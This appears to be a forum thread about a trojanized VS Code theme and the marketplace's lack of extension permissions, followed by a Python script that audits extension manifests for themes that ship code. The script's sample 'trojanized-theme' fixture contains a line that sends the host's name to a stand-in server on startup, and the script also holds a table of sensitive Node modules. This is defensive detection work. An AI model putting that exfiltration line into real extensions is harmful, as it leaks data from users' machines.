23 points

I’d like to see permissions in VSCode plugins, so e.g. I could see that a plugin x can’t touch the filesystem or internet and is therefore more likely to be benign.

14 points

“A group of Israeli researchers explored the security of the Visual Studio Code marketplace and managed to “infect” over 100 organizations by trojanizing a copy of the popular ‘Dracula Official’ theme to include risky code. Further research into the VSCode Marketplace found thousands of extensions with millions of installs.”

2 points

The plugin is called “Darcula Official” btw.

There is a more generic theme (for multiple applications) called Dracula.
JetBrains IDE has a theme called Darcula, and there are vscode themes on the marketplace that implement this.

So, it’s more than just a typosquat.

7 points

Every time a company bitches about opening “their” devices to third-party apps because of “security” and “malware”, I always think of shit like this.

The Google Play Store has tons of malware. iOS keeps it under wraps with their bullshit entry price and actually okay moderation, but are they a hundred and ten percent sure their signing key or database will never be exploited? Because there’s a mode on their devices to prevent zero-interaction malware, since somehow an SMS being received ends up in the kernel.

4 points

As @Deebster points out, on Android & iOS, apps need to ask for permission before accessing sensitive commands beyond the kernel. VisualStudio (as far as I know) doesn’t have a permissions layer. The article also mentions that scrutiny is lenient since VSCode is a dev tool used by (on average) knowledgeable users.

100% agree with you; Microsoft is mostly cost-cutting/shirking responsibility by not implementing tighter controls on external code in their tools.

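Since VS Code has no runtime permission layer, the nearest thing to the "can this extension touch the filesystem or internet?" check the top comment asks for is a static audit of what each installed extension declares and ships. The script below is an added example written for this thread, not code from the original page or from the researchers it cites. It reads an extension's `package.json`, flags the shape of the attack quoted above (an extension that contributes only a colour theme yet declares a JavaScript entry point and activates at startup), and lists which sensitive Node core modules the entry script pulls in. The sample manifests and the `SENSITIVE_MODULES` table are constructed for illustration; the manifest field names (`main`, `browser`, `activationEvents`, `contributes`) are the documented VS Code ones.

```python
"""Static capability audit of VS Code extension manifests.

Added example for the thread above, not code from the original page.
A colour theme is pure data and should ship no JavaScript entry point; an
extension that declares only data contributions but also declares `main`
or `activationEvents` has exactly the shape of a trojanized theme.
"""
import json
import re
from pathlib import Path
from typing import Optional

# Manifest fields that make the extension host load and run JavaScript.
ENTRY_POINT_FIELDS = ("main", "browser")

# Contribution points that are declarative data; no code is loaded for them.
DECLARATIVE_CONTRIBUTIONS = {
    "themes", "iconThemes", "productIconThemes", "grammars", "snippets",
    "languages", "keybindings", "configuration",
}

# Node core modules whose use implies filesystem, process or network reach.
# Assumed table chosen for illustration, not a VS Code API.
SENSITIVE_MODULES = {
    "child_process": "process execution", "fs": "filesystem access",
    "fs/promises": "filesystem access", "net": "network", "http": "network",
    "https": "network", "dns": "network", "os": "host enumeration",
}

_REQUIRE = re.compile(r"""require\(\s*['"]([^'"]+)['"]\s*\)""")
_IMPORT = re.compile(r"""(?:from|import)\s+['"]([^'"]+)['"]""")


def sensitive_modules(source: str) -> dict:
    """Map each sensitive core module the source imports to why it matters."""
    found = set(_REQUIRE.findall(source)) | set(_IMPORT.findall(source))
    out = {}
    for spec in found:
        name = spec[5:] if spec.startswith("node:") else spec  # strip 'node:' prefix
        if name in SENSITIVE_MODULES:
            out[name] = SENSITIVE_MODULES[name]
    return out


def audit_manifest(manifest: dict, entry_source: Optional[str] = None) -> dict:
    """Classify one extension from its manifest and (optionally) its entry script."""
    contributes = manifest.get("contributes") or {}
    entry_points = [manifest[f] for f in ENTRY_POINT_FIELDS if manifest.get(f)]
    activation = list(manifest.get("activationEvents") or [])
    runs_code = bool(entry_points) or bool(activation)
    declarative_only = bool(contributes) and set(contributes) <= DECLARATIVE_CONTRIBUTIONS
    modules = sensitive_modules(entry_source) if entry_source else {}
    findings = []
    if declarative_only and runs_code:
        findings.append("declares only data contributions but ships executable code")
    if "*" in activation:
        findings.append("activates unconditionally at startup ('*')")
    for mod, reason in sorted(modules.items()):
        findings.append(f"uses {mod} ({reason})")
    return {
        "name": manifest.get("name", "<unnamed>"),
        "publisher": manifest.get("publisher", "<unknown>"),
        "runs_code": runs_code,
        "suspicious": declarative_only and runs_code,
        "activation_events": activation,
        "sensitive_modules": modules,
        "capabilities": sorted(set(modules.values())),
        "findings": findings,
    }


def audit_extensions_dir(root: Path) -> list:
    """Audit every extension under an installed-extensions directory
    (for example ~/.vscode/extensions), reading the declared entry script."""
    reports = []
    for ext_dir in sorted(p for p in root.iterdir() if p.is_dir()):
        pkg = ext_dir / "package.json"
        if not pkg.is_file():
            continue
        manifest = json.loads(pkg.read_text(encoding="utf-8"))
        source = None
        for field in ENTRY_POINT_FIELDS:
            entry = manifest.get(field)
            if entry:
                path = ext_dir / entry
                if path.suffix == "":
                    path = path.with_suffix(".js")
                if path.is_file():
                    source = path.read_text(encoding="utf-8", errors="replace")
                    break
        reports.append(audit_manifest(manifest, source))
    return reports


# Constructed sample manifests and entry scripts (not real marketplace extensions).
THEME = {"themes": [{"label": "Clean", "uiTheme": "vs-dark", "path": "./themes/clean.json"}]}
SAMPLES = {
    "clean-theme": ({"name": "clean-theme", "publisher": "example", "contributes": THEME}, None),
    "trojanized-theme": (
        {"name": "trojanized-theme", "publisher": "example", "contributes": THEME,
         "main": "./extension.js", "activationEvents": ["*"]},
        "const cp = require('child_process');\nconst https = require('https');\n"
        "exports.activate = () => { https.get('https://example.invalid/?h=' + require('os').hostname()); };\n",
    ),
    "linter": (
        {"name": "linter", "publisher": "example",
         "contributes": {"commands": [{"command": "linter.run", "title": "Run linter"}]},
         "main": "./out/extension.js", "activationEvents": ["onLanguage:python"]},
        "import { workspace } from 'vscode';\nimport * as fs from 'node:fs';\n",
    ),
}


def audit_samples() -> dict:
    """Run the audit over the constructed samples; returns {name: report}."""
    return {name: audit_manifest(m, src) for name, (m, src) in SAMPLES.items()}


if __name__ == "__main__":
    root = Path.home() / ".vscode" / "extensions"
    reports = audit_extensions_dir(root) if root.is_dir() else list(audit_samples().values())
    for r in reports:
        flag = "SUSPICIOUS" if r["suspicious"] else ("code" if r["runs_code"] else "inert")
        print(f"{r['publisher']}.{r['name']}: {flag}; capabilities={r['capabilities'] or 'none'}")
        for f in r["findings"]:
            print("  -", f)
```

On the constructed samples the clean theme comes out inert, the linter is reported as running code with filesystem access (expected for a tool), and the trojanized theme is flagged because a theme-only manifest ships an entry script that activates at startup and reaches `child_process`, `https` and `os`. This is a triage aid, not a sandbox: it only looks at the declared entry file, so obfuscated code, dynamic `require(variable)` calls and anything buried in `node_modules` are not covered, and a `postinstall` hook or a dependency can run code the manifest never mentions.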
